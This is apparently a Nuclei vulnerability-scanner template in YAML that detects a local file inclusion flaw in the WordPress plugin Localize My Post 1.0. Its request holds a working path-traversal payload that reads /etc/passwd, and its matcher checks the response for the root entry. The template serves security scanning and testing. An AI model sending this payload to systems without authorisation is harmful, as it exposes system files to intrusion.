19 lines
482 B
YAML
19 lines
482 B
YAML
id: wp-localize-post-lfi
|
|
|
|
info:
|
|
name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
|
|
author: 0x240x23elu
|
|
severity: high
|
|
reference: https://www.exploit-db.com/exploits/45439
|
|
tags: wordpress,wp-plugin,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body |